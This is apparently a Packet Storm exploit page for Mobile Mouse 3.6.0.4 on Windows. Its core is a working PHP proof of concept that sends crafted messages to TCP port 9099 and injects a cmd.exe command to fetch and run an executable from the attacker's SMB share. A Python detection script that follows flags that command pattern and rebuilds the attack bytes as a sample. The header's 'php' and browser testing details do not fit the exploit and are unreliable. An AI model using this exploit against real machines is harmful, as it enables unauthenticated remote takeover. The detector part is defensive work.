
📄 Mobile Mouse 3.6.0.4 Remote Code Execution

🗓️ 21 Jan 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 120 Views

Mobile Mouse 3.6.0.4 on Windows is affected by remote code execution via TCP port 9099: a remote party can make the service run a command that fetches a payload from an SMB share.

Code
=============================================================================================================================================
    | # Title     : Mobile Mouse 3.6.0.4 php Code Execution Vulnerability                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.mobilemouse.com/downloads/setup.exe                                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: A remote code execution (RCE) vulnerability affecting Mobile Mouse version 3.6.0.4 on Windows systems.
                          The flaw allows a remote attacker to execute arbitrary commands on a vulnerable machine by abusing the Mobile Mouse service listening on TCP port 9099.
                          By crafting specific protocol messages, an attacker can instruct the service to launch a system command that retrieves and executes a malicious payload from a remote SMB share.
    
    [+] The provided proof of concept (PoC) is written in PHP and demonstrates how an attacker can:
    
    Connect to a target running Mobile Mouse 3.6.0.4
    
    Interact with the Mobile Mouse protocol
    
    Trigger execution of a command that downloads and runs an external executable via a network share
    
    This exploit is described as a second version or refinement of an exploit originally disclosed in September 2022, with references to Packet Storm Security advisories. The PoC assumes the attacker has already set up an SMB share to host the payload.
    
    [+] Impact:
    
    Successful exploitation can result in full remote code execution with the privileges of the Mobile Mouse service, potentially leading to complete system compromise.
    
    [+] Affected platform:
    
    Windows (tested on Windows 10 Pro, French edition)
    
    [+] Risk level:
    
    High, due to unauthenticated remote exploitation on a network-exposed service.
    
       (Related : https://packetstorm.news/files/id/172071/ Related CVE numbers:   ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php --target=192.168.1.100 --file=payload.exe --lhost=192.168.1.50
    
    [+] PayLoad :
    
    <?php
    
    function smb_server($lhost, $file_to_serve) {
        echo "[+] SMB server functionality not implemented in PHP. You need to set up an SMB share manually.\n";
    }
    
    $help = "Mobile Mouse 3.6.0.4 Remote Code Execution";
    
    $options = getopt("", ["target:", "file:", "lhost::"]);
    
    if (!isset($options["target"]) || !isset($options["file"])) {
        die("Usage: php script.php --target=<Target IP> --file=<File to Upload> [--lhost=<Local IP>] \n");
    }
    
    $host = $options["target"];
    $command_shell = $options["file"];
    $lhost = isset($options["lhost"]) ? $options["lhost"] : "127.0.0.1";
    $port = 9099;
    
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($socket === false) {
        die("[-] Socket creation failed: " . socket_strerror(socket_last_error()) . "\n");
    }
    
    socket_set_option($socket, SOL_SOCKET, SO_SNDBUF, 256);
    
    if (!socket_connect($socket, $host, $port)) {
        die("[-] Connection failed: " . socket_strerror(socket_last_error()) . "\n");
    }
    
    echo "[+] Connected to $host on port $port\n";
    
    // Start SMB Server (Placeholder in PHP, should be done manually)
    smb_server($lhost, $command_shell);
    
    $CONN = hex2bin("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04");
    socket_send($socket, $CONN, strlen($CONN), 0);
    
    $run = socket_read($socket, 54);
    
    $RUN = hex2bin("4b45591e3131341e721e4f505404");
    socket_send($socket, $RUN, strlen($RUN), 0);
    
    $run = socket_read($socket, 54);
    
    sleep(1);
    
    $payload = "cmd.exe /c start /B \\\\" . $lhost . "\\share\\" . $command_shell;
    $hex_payload = bin2hex($payload);
    
    $SHELL = hex2bin("4B45591E3130301E" . $hex_payload . "1E04" . "4b45591e2d311e454e5445521e04");
    socket_send($socket, $SHELL, strlen($SHELL), 0);
    
    $shell = socket_read($socket, 96);
    
    echo "Take The rose...\n";
    
    sleep(30);
    
    socket_close($socket);
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
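
A defender-side check for the traffic described above, added here as an example (Python, not part of the original advisory or the vendor's code): it splits a captured client-to-server stream on TCP port 9099 into messages and flags `KEY` messages whose text contains a UNC path or a command interpreter. Treating 0x1E as the field separator and 0x04 as the message terminator is an assumption read off the PoC's byte strings; `parse_frames`, `inspect_stream`, the rule names and the sample capture are constructed for this example.

```python
import re

FIELD_SEP = b"\x1e"  # assumption: field separator, inferred from the PoC bytes
FRAME_END = b"\x04"  # assumption: message terminator, inferred from the PoC bytes

# Text that should not arrive as remote keyboard input from a phone app.
SUSPICIOUS = [
    ("unc_path", re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")),
    ("command_interpreter", re.compile(r"\b(cmd|powershell)(\.exe)?\b", re.I)),
]

def parse_frames(stream: bytes):
    """Split a client-to-server stream into complete frames of text fields."""
    parts = stream.split(FRAME_END)
    # The last element is whatever followed the final terminator: an
    # incomplete frame (or b""), so it is not parsed.
    return [[f.decode("latin-1") for f in raw.split(FIELD_SEP)]
            for raw in parts[:-1] if raw]

def inspect_stream(stream: bytes):
    """Return (frame_index, rule_name, text) for each suspicious KEY frame."""
    alerts = []
    for index, fields in enumerate(parse_frames(stream)):
        if fields[0] != "KEY" or len(fields) < 3:
            continue  # handshake or malformed frame: nothing to inspect
        text = fields[2]
        for rule_name, pattern in SUSPICIOUS:
            if pattern.search(text):
                alerts.append((index, rule_name, text))
    return alerts

# Constructed sample: the client messages from the PoC above, with the command
# string built from the values in the advisory's usage line.
COMMAND = rb"cmd.exe /c start /B \\192.168.1.50\share\payload.exe"
SAMPLE = (
    bytes.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
    + bytes.fromhex("4b45591e3131341e721e4f505404")
    + bytes.fromhex("4B45591E3130301E") + COMMAND + bytes.fromhex("1E04")
    + bytes.fromhex("4b45591e2d311e454e5445521e04")
)
BENIGN = b"KEY\x1e100\x1ehello world\x1e\x04"  # constructed benign input

if __name__ == "__main__":
    for index, rule_name, text in inspect_stream(SAMPLE):
        print(f"frame {index}: {rule_name}: {text}")
```

In live monitoring, accumulate the `KEY` text per connection before matching, since the rules here see one message at a time.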
